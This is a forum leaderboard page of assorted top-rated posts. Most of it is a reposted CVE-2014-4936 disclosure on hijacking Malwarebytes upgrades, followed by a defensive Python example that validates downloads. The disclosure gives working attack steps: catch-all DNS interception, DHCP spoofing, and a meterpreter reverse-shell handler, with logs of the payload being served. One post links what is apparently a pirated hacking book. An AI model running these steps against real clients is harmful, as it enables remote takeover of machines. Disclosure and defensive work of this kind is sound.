
Leaderboard

Popular Content

Showing content with the highest reputation on 12/16/14 in all areas

  1. Black Hat Python, Python Programming for Hackers & Pentesters (Dec 2014) ''Python is the language of choice for hackers and security analysts for creating powerful and effective tools. Ever wonder how they do it? A follow-up to the perennial best-seller Gray Hat Python, Justin Seitz's Black Hat Python explores the darker side of Python's capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, extending the popular web hacking tool Burp Suite, and more. You'll learn how to: Create a trojan command-and-control using Github. Detect sandboxing and automate common malware tasks, like keylogging and screenshots. Escalate Windows privileges with creative process control. Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine. Abuse Windows COM automation to perform a man-in-the-browser attack. Exfiltrate data from a network most sneakily. Insider techniques and creative challenges show you how to extend the hacks, and are sure to make Black Hat Python irresistible to anyone interested in offensive security.'' Download: https://www.sendspace.com/file/tggtkv Source
    1 point
  2. iLikeIT. The first thing you must do urgently if you have an IP surveillance camera installed at home. Madalin Dumitru, manager at CyberSmartDefence, broke into a camera at a shop in Georgia without authorization, all live on PRO TV! After explaining that he had written some "little scripts" to find a great many vulnerable IPs, Madalin picked a few IPs and showed the general public how he managed to break the security system of a kindergarten, and then went on to show images from inside the kindergarten! If there are still "some on the forum", does anyone take notice? In trying to demonstrate how "tough" they are, they entered the admin console of a surveillance camera at a shop in Georgia without authorization, using the default credentials. What's more, they also showed images from that system's archive. Now that's a clear example of "DON'T DO THIS!" How did it go again, "We are ethical!"? I liked Buhnici: "And that's about it, there isn't much else you can do, right?!"
    1 point
  3. Compute the determinant the classic way; I think you'll then arrive at a simple expression, take its logarithm and find x. Tell me what you get after computing the determinant.
    1 point
  4. We don't side with people who can't express themselves in Romanian; we're not grammar nazis either, it's simply that you lose your seriousness and credibility, and nobody takes you seriously if you can't use the simplest words correctly. Edit: I deleted the thread in which you were shouting about abuse; if you had read the rules from the start and followed them, it probably wouldn't have come to this.
    1 point
  5. CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking

In June of this year I was playing around with Malwarebytes's products. I blogged about one of their products, Malwarebytes Anti-Malware, before when it had some issues; you can read that blog entry [ here ]. While playing around with Anti-Malware I discovered you could easily hijack the upgrade mechanism. After figuring out the protocol I could push my own upgrades. I reported this to Malwarebytes on July 16th, and it got a CVE assigned: CVE-2014-4936. About half a month later, around the time Malwarebytes had released their Anti-Exploit product Beta, I started to play around with this one as well. I discovered it was subject to the same upgrade hijacking method. Both vulnerabilities were scaled under one CVE, as it was a shared mechanism (and code). Officially the description for this CVE has become:

Malwarebytes Anti-Malware in consumer version 2.0.2 and earlier and Malwarebytes Anti-Exploit in consumer version 1.03 and earlier allow attackers to execute arbitrary code by hijacking the underlying network layer or DNS infrastructure between the client PC and the Malwarebytes Content Delivery Network (CDN). Corporate versions are not affected.

One thing to note is that consumer versions of MBAM and MBAE are affected by this. Business versions of the products do not use the Malwarebytes CDN for upgrades. This blog entry describes the vulnerability, how it works and how you can perform the attack, including a POC. Code for the POC is hosted on my Github repository: [ CVE-2014-4936 POC ]

Timeline:

Malwarebytes Anti-Malware
- Vulnerability discovered: June 18th 2014
- Vulnerability reported: July 16th 2014
- Vulnerability fixed in version 2.0.3, released on October 3rd 2014

Malwarebytes Anti-Exploit
- Vulnerability discovered: August 19th 2014
- Vulnerability reported: August 21st 2014
- Vulnerability fixed in version 1.04.1.1012, released on September 5th 2014

The vulnerability

Both Anti-Malware and Anti-Exploit have upgrade capabilities in the form of HTTP-transferred installation packages. Both software packages have no or limited upgrade validation implemented, thus allowing anyone who can work out the upgrade protocol to inject their own payload.

Updates and Upgrades

When the software, either MBAM or MBAE, starts, it will first resolve the Malwarebytes CDN:

    192.168.2.102 -> 8.8.8.8 (DNS) Standard query A data-cdn.mbamupdates.com

For MBAM it will start checking versions of the following:
- Consumer config
- Consumer news
- Consumer versioncheck
- Consumer HTML
- Signature database
- Program upgrades

If any of the version requests respond with a higher number than the client itself has, it will start downloading a partial or full update/upgrade. For the program upgrade it will download an installer for the latest version. We are interested in the program upgrade, as we can use this to send malicious payloads with ease, without having to go into any advanced exploitation techniques. The client will start by sending a version request. In the version request the User-Agent of the client shows the version (red underlined in the top section); the client has version 1.60.1.1000. The server responds by telling the client that version 1.75.0.1300 (red underlined in the bottom section) is the latest available. The client will then proceed by downloading this file, making a request to the CDN once more. The installation is downloaded and the installer for the new version starts.

The problem here lies with the fact that the MBAM client does not verify the actual installer it downloads. It can be whatever arbitrary Windows PE the server gives back. This is combined with the fact that MBAM starts the new client installer with full administrative privileges. A similar implementation and the same problem occur for MBAE as well: payloads are unchecked and executed with full administrative privileges, with Malwarebytes's protection uninstalled. This process is the same for MBAE, although the request is a little bit different. MBAM makes the following 2 requests for the version check, followed by the upgrade download:

    GET http://data-cdn.mbamupdates.com/v0/program/mbam.check.program HTTP/1.1
    GET http://data-cdn.mbamupdates.com/v0/program/data/mbam-setup-<new version>.exe HTTP/1.1

MBAE makes the following requests:

    GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/version.chk HTTP/1.1
    GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/data/mbae-setup-<new version>.exe

Hijacking the upgrades, exploiting the vulnerability

I have the following setup: 2 VMs in host-only network adapter mode:
- Windows XP running an old MBAM version, 1.60.1.1000
- Kali Linux running my MBAM CDN simulation python script

To exploit the client and to prove the vulnerability we need to intercept the DNS requests for data-cdn.mbamupdates.com. We have a few options:
- Change the DNS adapter settings to resolve DNS with my Kali system, which can do redirection
- Use the Windows hosts file to override DNS
- Grab ettercap in Kali and spoof towards the client to get DNS redirected.

To show the POC in a more 'natural' environment I chose the 3rd option. I'm going to show the vulnerability by performing a DHCP spoofing attack. There are of course other methods of attacking; you just need to be able to control the DNS of the client. Let's start:

First we set up both clients running side by side; we put the two VMs in host-only adapter mode. On the Windows XP machine we install the old MBAM version; I took the oldest MBAM installer I had, version 1.60.1.1000. On Kali we also have to start the Malwarebytes CDN simulator; you can get this script from the Github repository [ here ]. The simulator doesn't need any arguments, you can just run it by typing:

    python Malwarebytes-CDN-Simulator-CVE-2014-4936.py

Some older versions of MBAM (1.46 for example) follow an older upgrade pattern; although the vulnerability also exists for these versions, the provided Malwarebytes CDN simulator only works for MBAM since version 1.60.1.xxx. Older versions will crash during the upgrade. You could adapt the POC to work for these versions as well; it's a matter of changing the URLs it looks at. One thing you have to make sure of is that you throw your payload in the working directory of the CDN simulator and name it 'payload.exe' in order for it to be picked up and sent to the upgrading clients.

For this attack we'll generate a meterpreter payload; we're running Kali, which has Metasploit installed already. We can quickly generate a PE payload from the command line; in this example I use the meterpreter payload:

    msfcli multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4444 E

Note: Rapid7 published a post regarding the deprecation of msfpayload. This means in the future this payload has to be generated slightly differently. Read more on the change here: [ Good-bye msfpayload and msfencode ]

The handler will start and listen for incoming connections. Our reverse handler is now ready to receive incoming connections from our meterpreter payload; we can now start our attack. The next thing we need to do is get the DNS requests from the Windows XP machine redirected towards the Kali machine so they can be intercepted. We do this by grabbing Ettercap; in my case I grab Ettercap Graphical so I can visually show the attack in steps here.

Let's open up Ettercap and start by setting it in unified sniffing mode. The difference from bridged mode is that in unified mode we just sniff all packets that pass on the interface, while in bridged mode it will use two network interfaces, forward traffic from one to the other and perform a mitm attack. In our case we will do a DNS 'mitm' attack, but we don't need bridged mode. After opening up unified mode the menu will change. Now it's time to select our target: from the Hosts menu open up the host list and then hit Scan for hosts. A list of hosts in the currently connected network will appear; in my case there are 2:
- The Windows XP machine (192.168.56.102)
- The host running the virtual machines (192.168.56.1)

We select the target, the Windows XP machine with IP 192.168.56.102, and hit the 'Add to Target 1' button to select it. You can view the targets by clicking the Current Targets button under the Targets menu option to see if the machine was selected. Now we have to enable the DNS spoofing. Ettercap does have a plugin called 'dns_spoof', but I chose to use dnslib's intercept server. It's part of the DNSLib python library. Setting it up is a single command:

    python -m dnslib.intercept -p 53 -a 192.168.56.103 -i '* IN A 192.168.56.103'

Here we set up our listener on port 53, bind to address 192.168.56.103, intercept any request (* for the wildcard) and respond to it with the 192.168.56.103 IP. This means we will grab any request; you can also specify it a bit better by only responding for data-cdn.mbamupdates.com and *.data-cdn.mbamupdates.com, but for ease I chose to intercept everything and route it to the Kali machine. We can now start our attack. Open up the Mitm menu option and click on Dhcp spoofing. We will spoof DHCP towards the Windows XP client so we can force our own DNS server into the DNS server settings.

On the DHCP Spoofing popup we leave the IP Pool field empty, enter 255.255.255.0 in the Netmask field and put our own IP (192.168.56.103) in the DNS Server IP field to enforce the Kali host as the DNS server for the Windows XP machine. After entering the options hit the 'OK' button to start the attack. In the status log we can see Ettercap starting the attack. After we've started the DHCP spoofing we need to wait for the DHCP lease to renew (or force it on the client itself) so Ettercap can spoof it. After a bit Ettercap will log the DHCP request and its response to it:

    DHCP: [08:00:27:2F:56:97] REQUEST 192.168.56.102
    DHCP spoofing: fake ACK [08:00:27:2F:56:97] assigned to 192.168.56.102
    DHCP: [192.168.56.103] ACK : 192.168.56.102 255.255.255.0 GW 192.168.56.103 DNS 192.168.56.103

On the client we can now check the ipconfig settings for our spoofed DNS server. What we have to do now is either wait for the MBAM client on the Windows machine to contact the server for upgrades automatically, or enforce it by hitting the Check for Updates button on the Update tab in the MBAM GUI. On the Malwarebytes CDN script terminal we can see the client contacted us and has downloaded the payload:

    root@kali:~/mbam_upgrade# python Malwarebytes-CDN-Simulator-CVE-2014-4936.py
    Started Malwarebytes CDN simulator.
    [+] Attempt for URI: /v1/news/consumer/version.chk
    192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/news/consumer/version.chk HTTP/1.1" 200 -
    [+] Attempt for URI: /v1/custom/consumer/version.chk
    192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/custom/consumer/version.chk HTTP/1.1" 200 -
    [+] Attempt for URI: /v1/database/rules/version.chk
    192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/database/rules/version.chk HTTP/1.1" 200 -
    192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/mbam.check.program HTTP/1.1" 200 -
    [+] MBAM Client program version check: Client version 1.60.1.1000, enforced update version 2.60.1.1000
    192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/data/mbam-setup-2.60.1.1000.exe HTTP/1.1" 200 -
    [+] MBAM Client payload download.

On the Windows machine we see MBAM telling us a new version is available. If we accept and run the upgrade installer, we see MBAM disappear and nothing happens. Now if you check back with the meterpreter handler, we see the client has connected back to us. And due to how the upgrade works, the old MBAM install will execute the 'installer' with full administrative privileges, as you can see by typing getuid. We have successfully injected our payload into the upgrade process of MBAM. We have taken over the Windows XP machine by abusing the vulnerability. The same process can be used to take over MBAE clients; the only difference is the check-in URLs, but the Malwarebytes CDN simulator script already takes care of it. Enjoy!

11:00pm | URL: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking
Source: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking
    1 point
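The root cause in the post above is that the client hands whatever PE the "CDN" returns to a privileged installer launcher, so anyone who controls DNS for data-cdn.mbamupdates.com controls the upgrade. As an added example, written for this page and not Malwarebytes code or the blog's POC, the Python below shows the client-side checks that close that hole: a numeric version comparison that refuses downgrades and unknown versions, a pinned SHA-256 manifest the installer bytes must match before execution, a cheap PE sanity check, and, as defence in depth, a flag when the vendor CDN resolves to a private address as it does under the DNS spoof described in the post. The installer bytes, the manifest and the addresses are constructed for the demonstration; the function names are my own.

```python
"""Client-side upgrade validation for the flow described in the post.

Added example, not Malwarebytes code and not the blog's POC. The manifest,
installer bytes and IP addresses below are constructed for the demonstration;
a real client would ship the manifest inside its own signed binary or fetch it
over authenticated TLS and verify a vendor signature on it."""
import hashlib
import hmac
import ipaddress
import re

VERSION_RE = re.compile(r"^\d+(\.\d+){3}$")  # four dotted integers, e.g. 1.60.1.1000


def parse_version(text):
    """Turn '1.60.1.1000' into (1, 60, 1, 1000) so versions compare numerically
    instead of lexically. Anything that is not four dotted integers is rejected."""
    if not VERSION_RE.match(text):
        raise ValueError("malformed version string: %r" % text)
    return tuple(int(part) for part in text.split("."))


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def cdn_address_looks_hijacked(resolved_ip):
    """Defence in depth: a public vendor CDN must never resolve to a private,
    loopback, link-local or reserved address. The spoofed resolver in the post
    answers every query with 192.168.56.103, which this check flags."""
    ip = ipaddress.ip_address(resolved_ip)
    return bool(ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved)


def verify_installer(installer, advertised_version, installed_version, manifest):
    """Decide whether a downloaded installer may be handed to the privileged
    installer launcher. `manifest` maps version string -> SHA-256 hex digest of
    the genuine installer. Returns (True, 'ok') or (False, reason); the caller
    must not execute the payload unless the first element is True."""
    try:
        new = parse_version(advertised_version)
        old = parse_version(installed_version)
    except ValueError as exc:
        return False, str(exc)
    # The unpatched client trusted the server's version string; refuse downgrades
    # and refuse to re-run the current version.
    if new <= old:
        return False, "advertised version %s is not newer than installed %s" % (
            advertised_version, installed_version)
    expected = manifest.get(advertised_version)
    if expected is None:
        return False, "version %s is not in the pinned manifest" % advertised_version
    # Cheap structural check before hashing: Windows PE images start with 'MZ'.
    if not installer.startswith(b"MZ"):
        return False, "payload is not a PE image"
    # The core fix: the bytes must match a digest the network path cannot alter.
    actual = sha256_hex(installer)
    if not hmac.compare_digest(actual, expected):
        return False, "digest mismatch: expected %s got %s" % (expected, actual)
    return True, "ok"


# Constructed sample data (not real Malwarebytes artifacts).
GENUINE_INSTALLER = b"MZ" + b"\x90" * 64 + b"constructed genuine mbam-setup-1.75.0.1300"
ROGUE_PAYLOAD = b"MZ" + b"\x90" * 64 + b"constructed payload.exe served by a rogue CDN"
PINNED_MANIFEST = {"1.75.0.1300": sha256_hex(GENUINE_INSTALLER)}


def demo():
    """Run the checks over the constructed scenarios from the post."""
    installed = "1.60.1.1000"
    return {
        "genuine upgrade": verify_installer(GENUINE_INSTALLER, "1.75.0.1300", installed, PINNED_MANIFEST),
        "rogue payload, known version": verify_installer(ROGUE_PAYLOAD, "1.75.0.1300", installed, PINNED_MANIFEST),
        "rogue payload, made-up version": verify_installer(ROGUE_PAYLOAD, "2.60.1.1000", installed, PINNED_MANIFEST),
        "cdn resolved to 192.168.56.103": cdn_address_looks_hijacked("192.168.56.103"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-32s %s" % (name, result))
```

The digest check is what actually neutralises the attack: once the client compares the downloaded bytes against a value that did not travel over the hijackable path, spoofing DNS or DHCP only yields a rejected download. The address check is a cheap extra signal for logging, not a substitute; a manifest that is itself fetched unauthenticated over the same CDN would reintroduce the problem, which is why the docstring insists on a signed or pinned source for it.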
  6. the title doesn't refer to programming languages for beginners, it refers to general concepts about programming languages explained as if to a beginner. and you don't fuck ASM, ASM fucks you
    1 point
  7. As a complement to https://rstforums.com/forum/74965-colectie-linkuri-utile.rst, I'll add a list of my own.

Malware Auto-Analysis: PeStudio, MASTIFF, Comodo, VirusTotal, THREATANALYZR, VIRSCAN, EUREKA, XECSCAN, MALWAREVIZ, XANDORA, VICHECK, METASCAN
Document Analysis tools: OFFICE MAL SCANNER, OFFVIS, CRYPTAM, PDF EXAMINER, PDF TOOLS, PDF X-RAY, PDF X-RAY LITE, PEEPDF, ORIGAMI, PDF STREAMDUMPER
JavaScript Analysis tools: FIREBUG, JSUNPACK-N, JS BEAUTIFY, JS BEAUTIFIER, JavaScript Beautifier, JS DEOBFUSCATOR, RHINO, SPIDERMONKEY 24, MALZILLA
System & File Monitoring: SYSINTERNALS, REGSHOT, CAPTUREBAT, SYSANALYZER, PROCESS HACKER, PROCDOT (Windows & Linux), RADIOGRAPHY, RUNSCANNER, NORIBEN, API MONITOR
SWF analysis tools: SWFTOOLS (Windows & Linux), SWF INVESTIGATOR (OSX & Windows), SWF DECOMPILER (OSX & Windows), SWFRETOOLS, FLASM (Linux & OSX & Windows), FLARE (Linux & OSX & Windows), XXXSWF
PE tools: PE INSIDER, CFF EXPLORER, LORDPE, PEVIEW, PE EXPLORER, CHIMPREC, MALCODE ANALYSIS PACK (MAP)
ShellCode analysis tools: SHELLDETECT, LIBEMU, SHELLCODE2EXE, CONVERTSHELLCODE, SHELLCODE (MALWARE-TRACKER), JMP2IT (Source & Download)
Packer analysis & detection: RDG PACKER DETECTOR, PEiD, PACKERID, WINDOWS PACKER DETECTOR, LANGUAGE 2000, EXESCAN, Q-UNPACK
Hex editors: HEXPLORER, 010 EDITOR (Trial-Windows & Purchase & Trial-Linux & Trial-OSX), BINTEXT, HACKMAN HEX EDITOR, HXD
Network analysis tools: WIRESHARK (OSX & Windows), FAKENET, INETSIM, NCAT (OSX & Windows), APT PROTOCOL DECODERS (Custom Base64 & Comment crew des & Joy Trojan & Binanen & Mini ASP Trojan), FAKE DNS, APATE DNS, FAKE SMTP, HONEYD, TCP DUMP, FIDDLER, BURP SUITE, NETWORK MINER, NGREP, NETWITNESS
Memory Forensics tools: VOLATILITY, VOLATILITUX, LINUX MEMORY EXTRACTOR (LIME), MEMORYANALYSIS, BULK EXTRACTOR, MEMORYZE, REDLINE
Debuggers: OLLYDBG (Custom & OLLYDBG 2.0), IMMUNITY DEBUGGER, WINDBG, GDB, EDB
URL analysis tools: Rex Swain's HTTP Viewer, URLQUERY, UNMASK CONTENT, URL VOID, URL VOID Mask, BRIGHTCLOUD, NORTON SAFE WEB, VURL, SPONDULAS, PHISHTANK, SOURCE-CODE-VIEWER, NETRENDERER
DNS & IP lookup tools: CYBER-INTELLIGENCE, MXTOOLBOX, DOMAIN TOOLS, ROBTEX, NETWORK-TOOLS, DOMAIN DOSSIER, DOMAIN QUERIES, myDNStools, ULTRA TOOLS
Disassemblers: IDA PRO 6.3 Demo & IDA 5.0, HOPPER (Fedora & Ubuntu & OSX), CAPSTONE, PROFILER (Linux & OSX & Windows), Malware-Analyzer
    1 point
  8. I only asked, I didn't get anyone to break into it or anything like that. Since many said that half the sites/systems/networks etc. in the world are vulnerable, I was thinking maybe they have something more special and aren't vulnerable; from what I heard on another forum they have some thing that makes it not vulnerable.. I was just asking.. I was expecting a YES or NO answer.. PS: It helps my general knowledge... so I have something to be proud of in my country.. SRI isn't vulnerable, Kaspersky is.. even though there's a world of difference and Kaspersky is something else..
    -1 points
  9. https://www.sri.ro/ - Do you think they could be vulnerable? Just asking, I don't want to be using liquid soap at Christmas and rattling the bars with a bell..
    -1 points
  10. Ok, as a conclusion: Reckon sucks dick! @TheTime what do you say, can we get a T/C?
    -1 points
  11. Che chau7y m@ @yk3@? du~73 dr@ku 1@ $k0@l@. Translation: What are you doing here? Get the hell back to school.
    -2 points